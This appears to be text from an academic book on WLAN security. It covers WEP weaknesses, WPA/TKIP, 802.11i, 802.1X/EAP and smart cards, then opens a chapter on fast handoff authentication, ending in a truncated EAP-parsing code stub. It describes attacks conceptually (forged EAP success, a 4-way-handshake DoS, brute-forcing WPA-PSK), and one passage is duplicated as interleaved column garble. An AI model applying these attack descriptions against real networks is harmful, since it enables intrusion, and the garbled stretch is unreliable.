In a WLAN context, a passive attack takes advantage of several weaknesses in the key-scheduling algorithm of RC4. It could also be done by a comparison of the encrypted version of a known message (e.g., TCP fields) to repetitive IV-based encryption combinations of the known text to reveal the secret key (Morrison, 2002). In fact, the 24-bit IV implies that 2^24 packets can be protected with the same key, before changing the key. Because the IV is relatively short, and is transmitted in clear text, it will be repeated with sufficient frequency that the rest of the cipher can be relatively easily cracked. On the other hand, WEP by its design cannot efficiently reduce the overhead of denial-of-service attacks. In particular, it does not protect beacon packets, or the part of the packet header which includes the MAC address unencrypted. Consequently, it is not hard to infiltrate a WLAN using WEP.

Consequently, a dedicated task group called 802.11i has been set up by IEEE to create a replacement security solution. The released IEEE 802.11i amendment introduces an improved security mechanism called Wi-Fi protected access (WPA) to solve WEP-related authentication and confidentiality problems and to introduce an efficient frame integrity scheme. The 802.11i security solution (called robust secure network or WPA2) uses a new counter-mode/CBC-MAC protocol (CCMP) cipher based on the advanced encryption standard (AES) instead of RC4.

802.1X, WPA, and IEEE 802.11i (WPA2)

IEEE 802.11i is a dedicated task group to specify and to create a replacement security solution. It provides enhanced security services and mechanisms for the IEEE 802.11 medium access control beyond the features and capabilities provided by WEP. These security services are established by defining the temporal key integrity protocol (TKIP) and the counter-mode/CBC-MAC protocol (CCMP) that provide more robust data protection mechanisms than what WEP affords. 802.11i also introduces the concept of a security association and defines security association management protocols called the 4-way handshake and the group key handshake. Also, it specifies how IEEE 802.1X may be utilized by IEEE 802.11 LANs to effect authentication.

The IEEE 802.11i architecture usually contains or implements the following components:

• 802.1X for authentication, entailing the use of IETF’s EAP and an authentication server.
• Robust security network (RSN) for keeping track of associations.
• AES-based CCMP to provide confidentiality, integrity, and origin authentication. Another important element of the authentication process is the four-way handshake, explained below.

WPA

Because WEP has been shown to be totally insecure and in order to strengthen the weak keys used by WEP, the 802.11 Working Group has proposed a new WPA protocol called TKIP. This protocol is designed to strengthen the security of 802.1X networks and to leverage the existing WEP-enabled WLAN network interface card (NIC), while remaining backward compatible with existing hardware (no change in the hardware engine). This is done by distributing firmware/software upgrades including new algorithms to be added to WEP, such as the message integrity code (MIC) and the per-packet key mixing function.

TKIP uses a key scheme based on RC4, but unlike WEP, which uses the master key for authentication and per-packet encryption, TKIP extends this key hierarchy to reduce the exposure of the master secret and to provide per-packet key mixing, a message integrity check as well as a rekeying mechanism. Consequently, TKIP ensures that every data packet is sent with its own unique encryption key. Moreover, it includes a key hash function to improve resistance against Fluhrer attacks (Fluhrer et al., 2001) and a MIC, and it uses 802.1X for key management and establishment. The MIC prevents forged packets from being accepted. Thanks to per-packet key mixing, it is very hard for an eavesdropper to correlate the IV and the per-packet key used to encrypt the packet (Chandra, 2005). More precisely, TKIP hashes the combination of the IV value, the data encryption key (derived from the master secret), and the MAC address. This mechanism addresses the WEP problem of concatenating the key with the IV to form the traffic key, thereby reducing the applicability of the related key attack.

Key Hierarchy

The master secret used in the key hierarchy can be a preinstalled key or a per-session key. In fact, TKIP can be used with an IEEE 802.1X authentication server, which shares a master key with each user as a consequence of a successful authentication process, as well as in a preshared key (PSK) mode where all authorized users share a PSK. These two modes target two distinct environments, respectively enterprise and home networking.

As we cited before, TKIP extends the WEP key hierarchy to reduce the exposure of the (long term) master secret and to provide per-packet key mixing, a message integrity check as well as a rekeying mechanism. This extension is shown in the following figure. At a given layer, the different keys are generated by applying the pseudo random function (PRF) on, among other parameters, the key of the upper layer and the MAC addresses of the two endpoints.

Preshared Key

As we cited before, the 802.11i security solution uses 802.1X (see next section), which requires a logical authentication server entity. However, 802.11i defines the preshared key solution as an alternative to 802.1X-based master key establishment. This solution can be used for home or small networks

Figure 1. WPA key hierarchy

Pairwise branch: 802.1X / EAP method (enterprise authentication network) or Preshared Key (home network) → Pairwise Master Secret → Pairwise Transient Key → EAPOL-Key Confirmation Key (KCK), EAPOL-Key Encryption Key (KEK), Temporal Encryption Key (TEK), Temporal AP Tx MIC Key (TMK1), Temporal AP Rx MIC Key (TMK2) → Per-Packet Encryption Key.
Group branch: GMK initialized by the AP → GTK → Group Encryption Key (GEK), Group Integrity Key (GIK).

and does not require installation of an authentication server.

The PSK is a 256-bit random value (64 hexadecimal digits) or a pass phrase 8 to 63 bytes long, in which each STA has its own PSK tied to its MAC address and uses it to get access to the network. The key hierarchy is shown in Figure 1. The PSK is however used directly to compute the pair-wise transient key (PTK). The rest of the key computation process remains unchanged.

IEEE 802.1X

IEEE 802.1X is introduced for port-based network access control. It provides authentication to stations attached to a LAN port, establishing a point-to-point connection in case of success or preventing access from that port if authentication fails. 802.1X uses three terms:

• The Supplicant: A station that requests access to the network offered by the authenticator. It dialogues with the authentication server through the authenticator.
• The Authenticator: Typically a wireless access point that controls the state of each port (open/close) and mediates an authentication session between the supplicant and the authentication server.
• The Authentication Server: Typically a RADIUS (remote authentication dial in user service) server that performs the authentication process on behalf of the authenticator. The resulting decision consists of whether the supplicant is authorized to access the authenticator’s network. Note that 802.1X does not require use of a central authentication server, and thus can be deployed with stand-alone bridges or access points, as well as in a centrally managed scenario (802.1, 2004).

The most important component in the 802.11i architecture is the IEEE 802.1X port access entity (PAE), which controls the forwarding of data to and from the MAC. A STA always implements a Supplicant PAE and implements the EAP peer role, and an AP, acting as an Authenticator, always implements an Authenticator PAE and implements the EAP Authenticator role.

802.1X is based on EAP, which is a powerful umbrella that shelters multiple authentication
IEEE 802.1x
The most important component in 802.11i ar-
IEEE 802.1X is introduced for port-based network chitecture is the IEEE 802.1X port access entity
access control. It provides authentication to stations (PAE), which controls the forwarding of data to
attached to a LAN port, establishing a point-to- and from the MAC. A STA always implements a
point connection in case of success or preventing Supplicant PAE and implements EAP peer role,
access from that port if authentication fails. and an AP, acting as an Authenticator, always
802.1X uses three terms: implements an Authenticator PAE and implements
the EAP Authenticator role.
• The Supplicant: A station that requests ac- 802.1X is based on EAP, which is a powerful
cess to the network offered by the authentica- umbrella that shelters multiple authentication

Figure 2. 802.1X messages exchange between a supplicant, an authenticator, and the authentication server

methods. When IEEE 802.1X authentication is used within 802.11 networks, EAP is used transparently between the station and the (usually remote) authentication server and relayed through the AP. 802.1X requires the cooperation between the authentication server and an EAP method. In the case of a wireless LAN, the EAP method is required to perform mutual authentication and key management and distribution. Using the flexibility proposed by the IEEE 802.1X architecture, multiple EAP-based security protocols and mechanisms such as EAP-SIM (Haverinen & Salowey, 2006), EAP-TLS (transport layer security) (Aboba & Simon, 1999), and protected-EAP (Palekar, Simon, Zorn, Salowey, Zhou, & Josefsson, 2004) are proposed. These EAP methods are used with the 802.11i (or WPA2) and WPA standards in order to establish authenticated access and key calculation and distribution.

IEEE 802.11i (WPA2)

The procedures defined in 802.11i adopt the key hierarchy defined by WPA and provide fresh keys by means of protocols called the 4-way handshake and the group key handshake. The 4-way handshake is a pair-wise key management protocol used to confirm the mutual possession of a pair-wise master key (PMK) by two parties and to distribute a group temporal key (GTK). Several keys are established as a result of a successful authentication. The keys are derived from the PMK (in particular, the pair-wise transient key).

802.11i defines two key hierarchies: (a) a pair-wise key hierarchy to protect unicast traffic and (b) the GTK, a hierarchy consisting of a single key to protect multicast and broadcast traffic. Furthermore, it defines TKIP (uses existing hardware) and CCMP (needs additional hardware) to repair the problems caused by WEP. TKIP provides stronger security through a keyed cryptographic message integrity code (MIC), an extended IV space, and a key mixing function. The CCMP is used to provide data confidentiality, integrity, and replay protection.

4-Way Handshake

Once the authenticator and the mobile station have agreed upon a shared PMK, they can begin a 4-way handshake: STA represents the station; SPA and AA, SNonce and ANonce, represent the MAC address and the nonce of the station and authenticator, respectively; SN is the sequence number; msg1, msg2, msg3, and msg4 are indicators of different message types; and MIC_EAPOL-KCK() represents the
Figure 3. 802.11i 4-way handshake

Authenticator → Mobile Station, msg1: AA, ANonce, SN, msg1
Mobile Station → Authenticator, msg2: SPA, SNonce, SN, msg2, MIC_PTK(SNonce, SN, msg2)
Authenticator → Mobile Station, msg3: AA, ANonce, SN, msg3, GTK transmission
Mobile Station → Authenticator, msg4: SPA, SNonce, SN, msg4, MIC_EAPOL-KCK(SNonce, SN,

message integrity code calculated for the contents inside the bracket with the fresh PTK.

EAP

EAP is the IETF standard for extensible authentication for network access. It was designed to enable an extensible OSI layer 2 authentication before the IP configuration could be acquired. Originally developed for use with the point-to-point protocol (PPP) (Simpson, 1994), it has subsequently also been applied to IEEE 802 wired networks (802.1, 2004) and wireless networks such as 802.11 (WPA, 2003).

EAP can be viewed as a transport framework and supports multiple authentication mechanisms such as EAP-TLS, EAP-SIM and EAP-AKA, without having to prenegotiate a particular one. Authenticators do not need to understand each request type and may be able to simply act as a pass-through agent for a “back-end” server on a host. The authenticator starts the EAP exchanges in a port closed state; it needs however to look for the success/failure sent by the authentication server to open/close the port.

EAP packets include all relevant information about the required authentication scheme, for example, authentication method and packet code (request, response, success, or failure), and allow for method negotiation (a special NAK type). The exact content of these packets is up to the chosen EAP authentication mechanism. The progression of an authentication procedure also depends on the chosen authentication mechanism.

Authentication Server

Typically, 802.1X performs authentication and key management through an AAA server, such as RADIUS (authentication, authorization and accounting; remote authentication dial in user service) or DIAMETER. RADIUS (Aboba, 2006; Rigney, Willens, Rubens, & Simpson, 2000) is a widely deployed AAA protocol. As we cited, the EAP packets are carried by EAPOL directly over the wireless interface between the STA and the access point, and by EAP over RADIUS between the access point and the authentication server. This effectively creates an EAP conversation channel between the station and the authentication server, which allows the supplicant to authenticate. The authentication is realized by the chosen authentication mechanism. This phase will also generate a secret key that will be used in the key hierarchy. The key generated by EAP between the STA and the AAA server is therefore conveyed to the AP using the AAA protocol.

EAP-TLS

EAP-TLS defines the transport of transport layer security (Dierks & Allen, 1999) in EAP. TLS is one of the most deployed security protocols, which is mainly due to its integration in web browsers. TLS is an IETF-standardized authentication method derived from the secure sockets layer (SSL) protocol.

TLS authentication within EAP is quite straightforward. The TLS handshake packets are encapsulated in an appropriate EAP form and transported
0
Security in WLAN

between the station and the authentication server. Because the size of the certificates exceeds typical link MTUs, EAP-TLS additionally defines fragmentation. When the TLS authentication dialog succeeds, the authenticator (the host requiring the authentication on behalf of a supplicant) gets the authorization information delivered within the RADIUS access-accept message and access to the network is granted.

EAP-TLS defines the full handshake phase that involves the exchange of X.509 certificates and the cryptographic information to allow peers to be authenticated. This step requires several operations. First, peers must verify the integrity of certificates and should generally support certificate revocation messages (the peer may not have an Internet connection and therefore it can use the online certificate status protocol (OCSP) to obtain the revocation status of a certificate (Blake-Wilson et al., 2003)). Also, the certificate must be verified to ensure it is signed by a trusted certificate authority (CA). Finally, the client (i.e., station) should be able to view the information about the certificate and the CA root.

EAP-TLS indicates that a secure connection may be terminated and resumed later. This (abbreviated handshake) phase may be established if the client and the server agree. During this phase, the client and the server will use the master key, which is calculated during the last full handshake phase, to mutually authenticate and to calculate and generate new keys for the secure channel. After that, they verify the integrity of their exchanged handshake messages and then begin to exchange data over the secure connection.

The abbreviated handshake allows the client and the server to avoid several expensive cryptographic operations such as private key computations, client/server certificate decoding and verification, online consultation of the certificate revocation list (CRL), and generation and encryption/decryption of the premaster secret key, which is used for generating the master secret key. Moreover, the abbreviated TLS handshake shortens the authentication delay and preserves the precious radio bandwidth.

Security Problems

802.1X is intended to provide strong authentication, as well as key management and distribution. However, 802.1X suffers from some security problems related to its use in conjunction with WLAN 802.11. This conjunction suffers from the absence of an ensured synchronization of the various state machines, causing potential attacks such as man in the middle, session hijacking, and DoS. Furthermore, other attacks are possible because EAP does not include any integrity information in its transported packets. For example, at the end of the authentication process, the authenticator will send an EAP notification message to indicate the success or the failure of that process. Since this notification does not include any integrity protection data, an attacker can easily replace an EAP failure with an EAP success and deny the access to the WLAN network.

On the other hand, He and Mitchell (2004) demonstrate a DoS attack against the 4-way handshake of 802.11i. The attack can be realized by impersonating the authenticator, composing a Message 1, and sending it to the STA. The attacker sends a forged Message 1 to the STA after Message 2 of the 4-way handshake. The STA will calculate a new PTK corresponding to the nonces of the newly received Message 1, causing the subsequent handshakes to be blocked because this PTK is different from the one in the authenticator. The attacker can determine the appropriate time to send out Message 1 by monitoring the network traffic or just by flooding Message 1 with some modest frequency.

Some available tools can be used to crack WPA in PSK mode, especially coWPAtty, which is a brute-force cracking tool, which means that it systematically attempts to crack the WPA-PSK by testing numerous passwords, in order, one at a time (Fogie, 2005).

Additional Security Needs: Privacy and Identity Protection

During the authentication and security association phases, almost all security protocols, including 802.1X and EAP methods, exchange identity
related data in clear text and without any encryption. Therefore, security parameters flowing in the network could potentially be logged, archived, and searched.

Basically, certificates are issued by a trusted third party linking the identity of the certificate owner to the public key, whereas the shared secret is managed through its identifier. Certificate or shared key identifiers are usually sent in clear text and consequently, entities cannot protect their identities from eavesdropping. Thus, an intruder can learn who is reaching the network, when, and from where, and hence, track users by correlating client identity to connection location. Especially in WLAN, where the access medium is open to eavesdroppers and mobility is a reasonable service, location tracking can be a serious security issue. The PEAP and EAP-TTLS authentication methods can be used to protect the user identity. Both are two-phase protocols, with the first phase used to establish a TLS session with only server authentication and the second phase used to deliver, among others, the user identity.

Privacy and identity protection are increasingly required for 802.1X/EAP and consequently, research is being carried out to add credential and identity protection to EAP methods, especially to EAP-TLS. In this latter method, the client certificate is sent in clear text and therefore, an attacker can easily sniff packets conveying the client credentials. To avoid sending identity information in clear text during the TLS session, Hajjeh and Badra (in press) extend TLS with an enhanced, completely backwards compatible mechanism. The client identity protection is provided by symmetrically encrypting the client certificate with a key derived from the TLS master secret.

Hardware Security in WLAN

Many agencies (GAO, 2001) require the use of smart cards to overcome the vulnerabilities of the storage of private and shared keys. In fact, without smart cards, unauthorized access can be easily established to an authorized device (e.g., station) to retrieve confidential and personal data stored on it.

A smart card is a portable and tamper-resistant computer. It provides data security, data integrity, and personal privacy and supports mobility. Furthermore, major application areas including mobile communication use smart cards to convey subscription and identification information as well as to provide user identity and to build computer and network access. In the 802.1X/EAP context, Urien and Pujolle (2005) describe the interface of the EAP protocol in smart cards, which can store multiple identities associated with EAP methods and appropriate credentials. They present implementations of EAP-TLS smart cards, which securely store TLS security parameters, such as the client X.509 certificate, the client private RSA key, and the CA public key. For more information regarding the EAP smart card configuration and test steps, please refer to OpenEAPSmartCard (2006), which is an open Java card platform for authentication in Wi-Fi and WLAN networks.

The Universal Access Method

A different approach to authentication and authorization for WLAN is that based on the Web-based universal access method (UAM), the most prevalent form of access to WLAN. This approach defines a sign-on usage model using the user's navigator or Web browser and it is adopted by a number of WLAN hotspot providers. The Web-based UAM approach is very simple. When the user attempts to get Internet access through a given hotspot, the latter will redirect the user's browser to a local Web server. After redirection, the user will be invited to be authenticated by entering credentials (e.g., username, password). These credentials are tunnelled through a secure session, typically established using TLS.

Unlicensed Mobile Access

UMA stands for Unlicensed Mobile Access, a technology that provides access to GSM and GPRS mobile services over unlicensed spectrum technologies,
including Bluetooth and WLAN. By deploying UMA technology, service providers can enable subscribers to roam and handover between cellular networks and public and private unlicensed wireless networks using dual-mode mobile handsets. With UMA, subscribers receive a consistent user experience for their mobile voice and data services as they transition between networks (UMA, 2005).

The UMA architecture uses the following standard IP-based protocols without any modifications. It uses IP/TCP to provide a tunnel for GSM/GPRS signalling and SMS, IPSec ESP to provide a secure tunnel for user and control plane traffic, IKEv2 (Kaufman, 2005) and EAP-SIM (Haverinen & Salowey, 2006), and EAP-AKA (Arkko & Haverinen, 2006) for authentication and for establishing and maintaining a security association between the MS and the UNC.

EAP-SIM and EAP-AKA introduce smart card use (e.g., SIM cards). Due to the smart card advantages cited before, a potential attacker will not be able to access the smart card memory to spoof or retrieve the private and personal data. Moreover, the attacker will not be able to have these data in clear text outside the smart card since UMA is operating over IPSec ESP, which provides a strongly authenticated and encrypted session. However, care must be taken when implementing UMA technology on an open terminal. For a focused study on the impact of open terminal platforms when UMA technology is implemented with GSM, please refer to Grech and Eronen's (2005) work.

Security Performances in WLAN

Security mechanisms usually involve the use of certificates, public-key infrastructures, symmetric encryption/decryption, digest computation, and so forth. Therefore, 802.1X/EAP will add a performance impact, varying with the deployed security protocol. Several studies have evaluated the security performance of WLAN and the performance impacts of WEP, WPA, EAP-TLS, and other authentication protocols.

Baghaei (2003) provides a comparison study of the following eight security solutions used by 802.11:

1. No security: no security mechanism activated, with default configuration.
2. MAC address authentication carried out at the AP.
3. WEP authentication.
4. WEP authentication with 40-bit WEP encryption.
5. WEP authentication with 128-bit WEP encryption.
6. EAP-TLS authentication.
7. EAP-TLS with 40-bit WEP encryption.
8. EAP-TLS with 128-bit WEP encryption.

This comparison study includes an analysis of the effect of different TCP and UDP packet sizes on the performance of secure networks. It shows that WEP encryption significantly degrades the

Figure 4. Throughput of TCP, UDP traffic in a congested network
Figure 5. Computing times distribution for WLAN smart card

performance of congested wireless networks. Network performance degradation increased as the number of clients was increased under all security mechanisms.

On the other hand, and in order to show the impact of smart card use within 802.1X/EAP, we implemented EAP-TLS on smart cards; the performance, benefits, and drawbacks are discussed and analysed by Urien, Badra, and Dandjinou (2004). Figure 5 shows the repartition of computing times during the authentication phase. The smart card (10 MHz, 8-bit CPU, 2304 bytes RAM, 96 Kbytes ROM, 32 Kbytes E2PROM) processes the EAP-TLS protocol in about 5 seconds (Urien & Badra, 2006). Note that benchmarks are also performed on a 1 GHz Intel processor PC, where only about 50 ms are required to execute an EAP-TLS session. This demonstrates the cost and performance influence of using smart cards, which are required for storing credentials and private data.

Conclusion

Wireless technologies have evolved phenomenally over the last few years. Wireless transmission has a big impact on new services and applications because it is the method for data communication for, among others, cellular phones, text pagers, and Wireless LAN 802.11. In this chapter, we focused on WLAN security threats, which extend over several levels, from identity spoofing to traffic analysis. WLAN security risks have increased exponentially as wireless services have become more popular. The risks represent any malicious and undesirable event on the various applications, which possibly suffer from faults facilitating threat concretization. Risks can result in sniffing and hijacking of sensitive and personal data over the link for unprotected Internet access. The consequences are therefore various (Hurley, 2002): it can eat up bandwidth, but it could pose a darker issue as virus writers can use the access to anonymously send viruses out.

In answer, WLAN defined, among others, the 802.1X standard, providing a framework for authenticating and controlling user traffic to a protected network, as well as dynamically varying and exchanging encryption keys between the wireless entity and the authenticator server. This is done using EAP methods, which are also deployed jointly with the 802.11i and WPA standards. Implementing WLAN technologies in a secure network requires on one hand a combination of these security measures. On the other hand, organizations need to adopt security measures and practices that help bring down their risks to a manageable level. In early 2006, therefore, ISO members voted the IEEE's 802.11i standard for adoption.

References

802.1X. (2004). IEEE Standards for local and metropolitan area networks: Port based network access control (IEEE Std 802.1X-2004).

802.11i. (2004). Institute of Electrical and Electronics Engineers, supplement to standard for telecommunications and information exchange between systems: LAN/MAN specific requirements. Part 11: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications: Specification for enhanced security (IEEE 802.11i).

Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J., & Levkowetz, H. (2004). Extensible authentication protocol (EAP) (RFC 3748).
Aboba, B., & Calhoun, P. (2003). RADIUS (remote authentication dial in user service) support for extensible authentication protocol (EAP) (RFC 3579).

Aboba, B., & Simon, D. (1999). PPP EAP TLS authentication protocol (RFC 2716).

Arbaugh, W., Shankar, N., & Wan, Y. (2001). Your 802.11 wireless network has no clothes. Retrieved October 16, 2007, from http://www.cs.umd.edu/~waa/wireless.pdf

Arkko, J., & Haverinen, H. (2006). EAP-AKA authentication (RFC 4187).

Baghaei, N. (2003). IEEE 802.11 wireless LAN security performance using multiple clients (Honours Project Report).

Blake-Wilson, S., et al. (2003). Transport layer security (TLS) extensions (RFC 3546).

Borisov, N., Goldberg, I., & Wagner, D. (2001). Intercepting mobile communications: The insecurity of 802.11.

Chandra, P. (2005). Bulletproof wireless security. Elsevier.

Dierks, T., & Allen, C. (1999). The TLS protocol version 1.0 (RFC 2246).

Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the key scheduling algorithm of RC4 (LNCS 2259).

Fogie, S. (2005). Cracking Wi-Fi protected access (WPA): Part 2.

GAO (United States General Accounting Office). (2001). Information security: Advances and remaining challenges to adoption of public key infrastructure technology (Report to the Chairman, Subcommittee on Government Efficiency, Financial Management and Intergovernmental Relations, Committee on Government Reform, House of Representatives).

Grech, S., & Eronen, P. (2005). Implications of unlicensed mobile access (UMA) for GSM security. In Proceedings of IEEE/Create-Net SecureComm 2005, The First International Conference on Security and Privacy for Emerging Areas in Communication Networks, Athens, Greece, (pp. 3-12).

Hajjeh, I., & Badra, M. (in press). Identity protection ciphersuites for transport layer security (IETF Draft).

Haverinen, H., & Salowey, J. (2006). EAP-SIM authentication (RFC 4186).

He, C., & Mitchell, J. C. (2004). Analysis of the 802.11i 4-way handshake. In Proceedings of the 2004 ACM Workshop on Wireless Security (pp. 34-50). New York: ACM Press.

Hurley, E. (2002). Company tackles wireless network security risks. News Writer.

Kaufman, C. (Ed.). (2005). Internet key exchange (IKEv2) protocol (RFC 4306).

Khan, J., & Khwaja, A. (2003). Building secure wireless networks with 802.11. Indiana: Wiley.

Miller, B. R., & Hamilton, B. A. (2002). Issues in wireless security WEP, WPA and 802.11i. In Proceedings of the 18th Annual Computer Security Applications Conference.

Morrison, J. D. (2002). IEEE 802.11 WLAN security through location authentication. Naval Postgraduate School.

OpenEAPSmartCard. (2006). Retrieved October 16, 2007, from http://www.infres.enst.fr/~urien/openeapsmartcard/

Palekar, A., Simon, D., Zorn, G., Salowey, J., Zhou, H., & Josefsson, S. (2004). Protected EAP protocol (PEAP) version 2 (IETF Draft).

Rigney, C., Willens, S., Rubens, A., & Simpson, W. (2000). Remote authentication dial in user service (RADIUS) (RFC 2865).

Simpson, W. (1994). The point-to-point protocol (PPP) (RFC 1661).

Stahlberg, M. (2000). Radio jamming attacks against two popular mobile networks. In H. Lipmaa & H. Pehu-Lehtonen (Eds.), Proceedings of
the Helsinki University of Technology Seminar on Network Security: Mobile Security. Helsinki University of Technology.

UMA. (2005). Retrieved October 16, 2007, from http://www.umatechnology.org/

Urien, P., & Badra, M. (2006). Secure access modules for identity protection over the EAP-TLS: Smartcard benefits for user anonymity in wireless infrastructures. In M. Malek, E. Fernández-Medina, & J. Hernando (Eds.), SECRYPT 2006, Proceedings of the International Conference on Security and Cryptography, Setúbal, Portugal, (pp. 157-163).

Urien, P., Badra, M., & Dandjinou, M. (2004). EAP-TLS smartcards, from dream to reality. Paper presented at the Fourth IEEE Workshop on Applications and Services in Wireless Networks.

Urien, P., & Pujolle, G. (2005). EAP-support in smartcard (IETF Internet Draft).

WLAN. (2003). Information technology: Telecommunications and information exchange between systems. Local and metropolitan area networks. Specific requirements. Part 11: Wireless LAN medium access control (MAC) and physical layer (PHY) specifications (IEEE Std. 802.11-2003).

WPA. (2003). Wi-Fi protected access, version 2.0.

Chapter XLIV
Access Control in Wireless
Local Area Networks:
Fast Authentication Schemes

Jahan Hassan
The University of Sydney, Australia

Björn Landfeldt
The University of Sydney, Australia

Albert Y. Zomaya
The University of Sydney, Australia

Abstract

Wireless local area networks (WLAN) are rapidly becoming a core part of network access. Supporting
user mobility, more specifically session continuation when changing network access points, is
an integral part of wireless network services. This is because of the popularity of emerging real-time
streaming applications that can be commonly used when the user is mobile, such as voice-over-IP and
Internet radio. However, mobility introduces a new set of problems in wireless environments because of
handoffs between network access points (APs). The IEEE 802.11i security standard imposes an authen-
tication delay long enough to hamper real-time applications. This chapter will provide a comprehensive
study on fast authentication solutions found in the literature as well as the industry that address this
problem. These proposals focus on solving the mentioned problem for intradomain handoff scenarios
where the access points belong to the same administrative domain or provider. Interdomain roaming is
also becoming common-place for wireless access. We need fast authentication solutions for these en-
vironments that are managed by independent administrative authorities. We detail such a solution that
explores the use of local trust relationships to foster fast authentication.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Access Control in Wireless Local Area Networks: Fast Authentication Schemes

Introduction

Wireless local area networks (WLAN) are rapidly becoming a core part of enterprise network access. The IEEE 802.11 standardization has led to vendor interoperability and rapidly plummeting prices, making wireless access an economically tantalizing alternative to wired access. Currently, enterprise deployment incorporates support for mobility between access points (AP) as well as security and monitoring solutions. Mobility introduces a new set of problems, not present in a wired infrastructure, due to handoffs between network access points. The implication of frequent handoffs to different APs is that, for communication security, the IEEE 802.11 standard requires that the mobile node (MN) undergo a full authentication process each time it wants to connect to a new AP. The recent security ratifications from the IEEE task group i (TGi) (IEEE 802.11i, 2004) defined several security remedies for WLANs in the standard IEEE 802.11i. According to this standard, the complete (full) authentication process involves the use of the 802.1X port-based access control architecture, and provides mechanisms for key management (IEEE 802.1X, 2001). An AAA server such as RADIUS (Rigney, Willats, Rubens, & Simpson, 2000; Rigney, Willats, & Calhoun, 2000) is to be used for authentication and key derivation. Following a successful authentication, the MN and the AP are to undertake a four-way handshake protocol for deriving various encryption keying material. Keying material derived in this way is then used in the encrypted (secure) communication sessions between an AP and the MN. Thus the four-way handshake, which does not involve the AAA server, is a must in each secure association of an MN to the AP and cannot be avoided.

However, the authentication process suggested in the 802.11i ratifications, using the extensible authentication protocol (EAP) over transport layer security (TLS), can introduce significant handoff delays because it involves the exchange of a round of messages between the MN and the AAA server via the AP. It has been shown that a full EAP-TLS authentication (i.e., the full authentication) can take as long as 1.1 seconds (Mishra, Shin, & Arbaugh, 2004). The delay can only increase when the AAA server is located at the ISP's site, topologically far from the AP site. The longer the delay in handoffs, the longer the outage time experienced by applications. While this kind of delay is acceptable for applications with flexible response time requirements, emerging real-time applications, such as wireless voice-over-IP, have stringent delay requirements (Cisco IP phone). Thus, this kind of network delay and outage is detrimental for real-time applications, especially in frequent handoff scenarios, which hinders the success of wireless local networks in supporting such popular applications.

The aim of this chapter is, therefore, to provide readers with state-of-the-art knowledge on this significant issue, and solutions as found in the industry and literature. The mentioned issue arises from two directions: (1) intradomain handoffs and (2) interdomain handoffs. Thus solutions are needed for both. While various solutions have mostly been proposed for the first direction, we will show that interdomain, or interprovider, handoffs are becoming commonplace and need specific solutions that are different from the intradomain solutions because of the involvement of more than one administrative authority in the latter case.

To reduce the handoff delays due to the exchanges of authentication messages when an MN hands off to a new AP (nAP), there have been several proposals from the industry and the research community. These solutions are targeted at providing fast access when the changing APs belong to the same administrative network domain.

However, handoffs within a single domain might not always be the case. There are possible scenarios where different service providers need to collaborate to provide continuous connectivity to roaming users for supporting seamless services. In addition, IEEE 802.11 has led to price levels suitable for the mass consumer market and small operators. This has caused an explosive trend in the deployment of residential gateways (RG) for home networking and wireless hotspots at city areas by various business owners and hotspot providers. The capacity offered by these APs and residential gateways (RGs) at various sites may not
be fully utilized since the traffic patterns typically vary considerably over the course of a day. Thus, there will be unutilized capacity that could be offered to active users despite not being their serving provider or AP.

In this model, each WLAN site that is connected to the Internet via an individual RG or AP can be considered as an individual domain, as RGs are owned by individual residential consumers and wireless routers (or APs) at hotspots belong to individual providers or businesses. An example of a current operational commercial system building on this principle is the FON (FON Web site) community, where individual subscribers share excess capacity with the global FON community and FON itself provides billing support so that used capacity is billed to a user's own account.

If the current deployment trend continues, in dense residential areas it will be common to find a substantially large number of RGs within range. This also provides the opportunity for load-sharing or load-balancing among the RGs by handing off some visiting connections to other RGs within range when the original RG's link utilization or load increases and affects its home traffic. Therefore, we see stationary handoff scenarios emerging in the multiowner RG access network architecture, which can also apply to the commercial city area hotspots. Depending on the load variation, there may be situations when, during an active session, a visiting mobile node will have to undergo frequent handoffs to many new RGs. The same applies to the city area hotspot architecture.

The previous proposals and implementations mentioned above aim at supporting a single domain where centralized control is an advantage. In the collaborating scenarios between service providers this is not the case, since each domain has its own authentication mechanisms that are closed to other parties. In the RG access network or the city area hotspot architecture, such centralized control is not possible since each RG or AP is under its own authority and administration. Hence, a distributed approach is required for multiowner and multiprovider handoff scenarios.

The rest of the chapter is organized as follows. In the next section we provide background information on the port-based, authentication-driven access control suggested in IEEE 802.11i, the security ratifications from the IEEE task group i. This section equips the reader with the fundamentals of the authentication-based access control process using the 802.1X architecture. In the third section we elaborate fundamental proposals found in the literature that provide fast-authentication schemes applicable in intradomain handoffs. This section also contains a subsection on comparative analysis of the presented proposals. In the fourth section we provide a possible direction that we have proposed for solving the interdomain handoff latency problem caused by authentication delays. We sketch some open issues, and finally, we conclude this chapter.

IEEE 802.11i Authentication Process

In this section, we provide fundamental information on the authentication-based access control mechanism for IEEE 802.11i, the security ratifications from IEEE 802.11. IEEE 802.11i includes the use of the architectural framework of IEEE 802.1X, the port-based network access control standard for different link layer technologies such as IEEE 802.3, FDDI, IEEE 802.11, and so forth. In the standard, there are three entities involved in the authentication process: the supplicant or the user wireless device, the authenticator or the network port (wireless access point), and the authentication server such as the RADIUS server. Figure 1 shows this setup. The 802.1X standard uses the extensible authentication protocol (Blunk, Vollbrecht, Aboba, Carlson, & Levkowetz, 2003) to support a variety of authentication mechanisms, of which transport layer security (TLS), providing strong encryption and authentication at the transport layer, is the most commonly used mechanism (EAP-TLS) (Aboba & Simon, 1999) within 802.11 networks. Next, we look at the functionalities of the entities of the 802.1X framework in light of the 802.11 network setting:
Figure 1. 802.1X setup. The wireless device (supplicant) talks to the wireless AP (authenticator) over the wireless link using EAP over LAN; the AP talks to the authentication server (e.g., RADIUS) over the secure network using EAP over RADIUS.
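The EAP frames that EAPOL and EAP over RADIUS carry in Figure 1, together with the EAP-TLS fragmentation that the preceding chapter ("Security in WLAN") describes for certificates larger than the link MTU, as an added Python example; it is not code from this chapter, from the previous one, or from any implementation they cite. The header layout (Code, Identifier, Length, Type) follows RFC 3748 and the EAP-TLS flag byte (L, M, S) follows RFC 2716; the sample frames, the 16 KB reassembly limit and the helper names are constructed for this example.

```python
import struct

EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
EAP_TYPE_TLS = 13                              # EAP method type for EAP-TLS (RFC 2716)
FLAG_L, FLAG_M, FLAG_S = 0x80, 0x40, 0x20      # EAP-TLS flags: Length included, More, Start


class EapError(ValueError):
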